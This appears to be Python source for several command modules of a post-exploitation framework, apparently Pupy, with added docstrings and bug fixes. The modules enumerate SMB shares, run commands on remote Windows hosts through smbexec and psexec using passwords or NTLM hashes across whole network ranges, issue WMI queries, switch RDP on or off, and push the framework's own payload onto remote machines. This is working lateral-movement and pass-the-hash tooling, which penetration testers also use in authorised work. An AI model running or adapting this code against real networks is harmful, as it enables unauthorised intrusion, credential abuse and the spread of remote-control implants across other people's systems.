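def run(self, args):
    """List SMB shares of the local host or of one or more remote hosts.

    Local mode (``args.local``): prints the result of
    ``pupwinutils.drives.shared_folders()``; on a non-Windows client a
    warning is emitted instead. A failure is reported through
    ``self.error`` and the command ends there.

    Remote mode: ``args.target`` is one host or a CIDR network (contains
    ``/``). For every host ``pupyutils.share_enum.connect`` is called with
    ``args.port``, ``args.user``, ``args.passwd``, ``args.hash`` and
    ``args.domain``. It returns a dict carrying either an ``error`` key
    (with optional ``os``/``name``) or ``os``/``name``/``auth``/``shares``;
    results are reported via ``self.error`` / ``self.success`` /
    ``self.table``.
    """
    # getattr: the attribute may be absent on a sub-command that does not
    # define it (presumably why the original wrapped this in a bare
    # ``except: pass``).
    if getattr(args, 'local', False):
        try:
            if self.client.is_windows():
                print(self.client.conn.modules['pupwinutils.drives'].shared_folders())
            else:
                self.warning(
                    'this module works only for windows. Try using: run shares remote -t 127.0.0.1'
                )
        except Exception as e:
            # Surface the failure instead of silently swallowing it.
            self.error(e)
        # Local mode is complete; the original fell through to the remote
        # path and then complained about a missing target.
        return

    target = getattr(args, 'target', None)
    if not target:
        self.error("target (-t) parameter must be specify")
        return

    hosts = IPNetwork(target) if "/" in target else [target]
    connect = self.client.remote('pupyutils.share_enum', 'connect')

    for host in hosts:
        result = connect(str(host), args.port, args.user, args.passwd,
                         args.hash, args.domain)

        if 'error' in result:
            if 'os' in result:
                self.error('{}:{} OS={} NAME={}: {}'.format(
                    host, args.port, result['os'], result['name'],
                    result['error']))
            else:
                self.error('{}:{}: {}'.format(host, args.port, result['error']))
            continue

        self.success('{}:{} OS=[{}] NAME=[{}] AUTH={}'.format(
            host, args.port, result['os'], result['name'], result['auth']))
        shares = [{'SHARE': x[0], 'ACCESS': x[1]} for x in result['shares']]
        self.table(shares, ['SHARE', 'ACCESS'])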
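def run(self, args):
    """Run ``args.command`` on one or more hosts via ``pupyutils.psexec.smbexec``.

    ``args.target[0]`` is a single host or a CIDR network (contains ``/``).
    The special commands ``pupy86``/``pupy32``/``pupy64`` are handed to
    ``powerloader.serve`` instead; the completion objects it returns are
    waited for at the end. For every other command the ``(output, error)``
    pair returned by ``smbexec`` is written to ``self.log`` / ``self.error``.
    """
    target = args.target[0]
    hosts = IPNetwork(target) if "/" in target else [target]

    smbexec = self.client.remote('pupyutils.psexec', 'smbexec')
    completions = []

    for host in hosts:
        if args.command in ('pupy86', 'pupy32', 'pupy64'):
            _, completion = powerloader.serve(
                self, self.client.get_conf(),
                host=str(host), port=args.port,
                user=args.user, domain=args.domain,
                password=args.passwd, ntlm=args.hash,
                execm=args.execm, timeout=args.timeout,
                arch='x64' if args.command == 'pupy64' else 'x86')
            # serve() may hand back a falsy completion (the psexec variant
            # of this command guards for it); skip those so the wait loop
            # below never calls is_set() on None.
            if completion:
                completions.append(completion)
            continue

        output, error = smbexec(
            str(host), args.port, args.user, args.domain, args.passwd,
            args.hash, args.command, args.share, args.execm, args.codepage,
            args.timeout, not args.noout)

        if output:
            self.log(output)
        if error:
            self.error(error)

    if completions:
        self.info('Wait for completions')
        for completion in completions:
            if not completion.is_set():
                completion.wait()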
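def run(self, args):
    """Run a WQL query on one or more hosts and print the result.

    ``args.query`` tokens are joined by spaces; when empty a default
    ``Win32_WMISetting`` query is used. ``args.target[0]`` is a single host
    or a CIDR network (contains ``/``). ``pupyutils.psexec.wql`` receives
    ``args.port``, ``args.user``, ``args.domain``, ``args.passwd``,
    ``args.hash``, the query and ``args.timeout`` and returns
    ``(columns, values)``; a single column is rendered as a ``List``, a
    single row as KEY/VALUE pairs, anything else as a ``Table``.
    A per-host exception is reported via ``self.error``.
    """
    wql = self.client.remote('pupyutils.psexec', 'wql')

    if args.query:
        cmdline = ' '.join(args.query)
    else:
        cmdline = ('SELECT DatabaseDirectory,BuildVersion,LoggingDirectory '
                   'FROM Win32_WMISetting')

    target = args.target[0]
    hosts = IPNetwork(target) if "/" in target else [target]

    for host in hosts:
        try:
            columns, values = wql(
                str(host), args.port, args.user, args.domain, args.passwd,
                args.hash, cmdline, args.timeout)

            # An empty answer from one host must not abort the remaining
            # hosts of a network scan (the original returned here).
            if not columns:
                continue

            if len(columns) == 1:
                self.log(List(
                    list(_stringify(x[0]) for x in values),
                    caption=columns[0]))
            elif not values:
                continue
            elif len(values) == 1:
                records = [{
                    'KEY': column,
                    'VALUE': _stringify(values[0][idx]),
                } for idx, column in enumerate(columns)]
                self.log(Table(records, ['KEY', 'VALUE']))
            else:
                records = [{
                    column: _stringify(value[idx])
                    for idx, column in enumerate(columns)
                } for value in values]
                self.log(Table(records, columns))
        except Exception as e:
            self.error(e)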
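def run(self, args):
    """Run ``args.command`` on one or more hosts via ``pupyutils.psexec.smbexec``.

    ``args.target[0]`` is a single host or a CIDR network (contains ``/``).
    ``smbexec`` receives the connection parameters (``port``, ``user``,
    ``domain``, ``passwd``, ``hash``), the command, ``share``, ``execm``,
    ``codepage``, ``timeout`` and whether output is wanted (``not noout``),
    and returns ``(output, error)`` which go to ``self.log`` / ``self.error``.
    """
    target = args.target[0]
    hosts = IPNetwork(target) if "/" in target else [target]

    smbexec = self.client.remote('pupyutils.psexec', 'smbexec')

    for host in hosts:
        # str(): a CIDR target yields address objects, not strings; the
        # sibling smbexec command already converts them.
        output, error = smbexec(
            str(host), args.port, args.user, args.domain, args.passwd,
            args.hash, args.command, args.share, args.execm, args.codepage,
            args.timeout, not args.noout)

        if output:
            self.log(output)
        if error:
            self.error(error)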
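def run(self, args):
    """Enable/disable RDP on the local host, or check RDP on remote hosts.

    Local mode (``args.local`` with ``args.enable`` / ``args.disable``) is
    Windows only and requires admin privileges as reported by
    ``pupwinutils.rdp.check_if_admin``; when the check fails the command
    stops. Remote mode (``args.remote``) iterates ``args.target[0]`` (one
    host or a CIDR network) and calls ``pupyutils.rdp_check.check_rdp``
    with ``args.username``, ``args.password``, ``args.domain`` and
    ``args.hashes``. Both helpers print directly, hence ``redirected_stdio``.
    """
    # TO DO: enable multi RDP session, see MIMIKATZ for example
    if args.local:
        if args.enable or args.disable:
            if not self.client.is_windows():
                self.error("This option could be used only on windows hosts")
                return

            rdp = self.client.conn.modules["pupwinutils.rdp"]
            # Stop when not admin: the original only printed the error and
            # still attempted the change.
            if not rdp.check_if_admin():
                self.error("Admin privileges are required")
                return

            with redirected_stdio(self):
                if args.enable:
                    rdp.enable_rdp()
                if args.disable:
                    rdp.disable_rdp()

    elif args.remote:
        # args.target is a list (the CIDR branch indexes it); the original
        # appended the whole list in the single-host case.
        target = args.target[0]
        hosts = IPNetwork(target) if "/" in target else [target]

        for host in hosts:
            with redirected_stdio(self):
                self.client.conn.modules["pupyutils.rdp_check"].check_rdp(
                    host, args.username, args.password, args.domain,
                    args.hashes)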
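def run(self, args):
    """Run ``args.command`` on one or more hosts via ``pupyutils.psexec.psexec``.

    ``args.target[0]`` is a single host or a CIDR network (contains ``/``).
    The special commands ``pupy86``/``pupy32``/``pupy64`` go through
    ``powerloader.serve``. Otherwise ``psexec`` is called with two
    callbacks: ``_on_data`` writes each chunk (prefixed with host:port when
    ``args.verbose``, else raw to ``self.stdout``) and ``_on_complete``
    reports an error message, or ``Completed`` in verbose mode, and sets
    the per-host ``Event``. All events are waited for at the end.
    """
    target = args.target[0]
    hosts = IPNetwork(target) if "/" in target else [target]

    psexec = self.client.remote('pupyutils.psexec', 'psexec', False)
    completions = []

    for host in hosts:
        if args.command in ('pupy86', 'pupy32', 'pupy64'):
            _, completion = powerloader.serve(
                self, self.client.get_conf(),
                host=str(host), port=args.port,
                user=args.user, domain=args.domain,
                password=args.passwd, ntlm=args.hash,
                execm=args.execm, timeout=args.timeout,
                arch='x64' if args.command == 'pupy64' else 'x86')

            if completion:
                completions.append(completion)
            continue

        completion = Event()

        # The per-host values are bound as defaults: if a callback fires
        # after the loop has moved on (the final wait suggests they may),
        # a plain closure would log the wrong host and set the wrong Event,
        # leaving the others waiting forever.
        def _on_data(data, host=host):
            if args.verbose:
                self.log(u'{}:{}: {}'.format(host, args.port, data))
            else:
                self.stdout.write(data)

        def _on_complete(message, completion=completion):
            try:
                if message:
                    self.error(message)
                elif args.verbose:
                    # was `elif message and args.verbose`, which could
                    # never be true after the `if message` branch
                    self.info('Completed')
            finally:
                completion.set()

        psexec(
            str(host), args.port, args.user, args.domain, args.passwd,
            args.hash, args.command, args.execm, args.codepage,
            args.timeout, not args.noout, None, _on_data, _on_complete,
            args.verbose)

        completions.append(completion)

    if completions:
        if args.verbose:
            self.info('Wait for completions')

        for completion in completions:
            if not completion.is_set():
                completion.wait()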